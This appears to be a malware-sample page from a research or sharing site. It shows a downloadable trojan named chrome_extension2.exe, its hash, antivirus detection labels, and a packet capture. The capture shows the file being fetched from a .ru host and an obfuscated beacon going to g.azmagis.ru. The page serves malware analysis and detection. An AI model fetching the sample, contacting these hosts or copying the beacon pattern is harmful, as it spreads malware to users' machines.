Download Attachments
-
1
chrome_extension2
Date added: October 29, 2016 7:16 am
Added by: admin
File size: 26 KB
Downloads: 282
SHA256: |
b2519cf81b527b2756e3836ed3c6a36b26f30cbb5384fdb1f905f2235207144e |
File name: |
chrome_extension2.exe |
Detection ratio: |
46 / 56 |
Analysis date: |
2016-10-29 07:07:19 UTC ( 0 minutes ago ) |
ALYac |
Trojan.GenericKD.3567426 |
20161029 |
AVG |
Win32/DH{gVQ2JQ?} |
20161029 |
AVware |
Trojan.Win32.Generic!BT |
20161029 |
Ad-Aware |
Trojan.GenericKD.3567426 |
20161029 |
AegisLab |
Troj.W32.Selfdel!c |
20161029 |
AhnLab-V3 |
Trojan/Win32.Gen.N2119271628 |
20161028 |
Antiy-AVL |
Trojan/Win32.SelfDel |
20161029 |
Arcabit |
Trojan.Generic.D366F42 |
20161029 |
Avast |
Win32:Malware-gen |
20161029 |
Avira (no cloud) |
TR/Agent.45837 |
20161028 |
BitDefender |
Trojan.GenericKD.3567426 |
20161029 |
CAT-QuickHeal |
Trojan.Mupad |
20161028 |
ClamAV |
Win.Trojan.Agent-1725685 |
20161029 |
Comodo |
Application.Win32.RuKometa.~E |
20161028 |
CrowdStrike Falcon (ML) |
malicious_confidence_100% (D) |
20161024 |
Cyren |
W32/Trojan.NKAP-2076 |
20161029 |
DrWeb |
Trojan.LoadMoney.1831 |
20161029 |
ESET-NOD32 |
a variant of Win32/RuKometa.E potentially unwanted |
20161029 |
Emsisoft |
Trojan.GenericKD.3567426 (B) |
2016-10-29 01:18:15.191333 IP 192.168.1.102.64195 > 193.238.153.11.80: Flags [P.], seq 0:309, ack 1, win 256, length 309: HTTP: GET /chrome_extension2.exe HTTP/1.1
E..]p.@…k….f…….P._byc..qP…X…GET /chrome_extension2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: civdmloqpjp.0qhvmjrq2k.ru
Connection: Keep-Alive
2016-10-29 01:18:15.346432 IP 192.168.1.102.64195 > 193.238.153.11.80: Flags [.], ack 1, win 256, length 0
E..(p.@…m….f…….P._c.c..qP………….
—
E..(A2@….F…f…4…P6…G..@P………….
2016-10-29 01:18:29.233943 IP 192.168.1.102.64196 > 185.20.186.52.80: Flags [P.], seq 0:524, ack 1, win 256, length 524: HTTP: GET /%f3%07%27%f6%46%d3%36%86%27%f6%d6%56%f5%56%87%47%56%e6%37%96%f6%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%43%83%62%76%57%96%46%d3%93%56%36%43%23%16%73%36%43%03%03%66%43%03%26%26%93%83%43%36%83%93%73%36%36%16%73%33%03%23%53%16%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E..4A3@….9…f…4…P6…G..@P…….GET /%f3%07%27%f6%46%d3%36%86%27%f6%d6%56%f5%56%87%47%56%e6%37%96%f6%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%43%83%62%76%57%96%46%d3%93%56%36%43%23%16%73%36%43%03%03%66%43%03%26%26%93%83%43%36%83%93%73%36%36%16%73%33%03%23%53%16%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: chrome_extension 3.48
Host: g.azmagis.ru
Cache-Control: no-cache
Please follow and like us: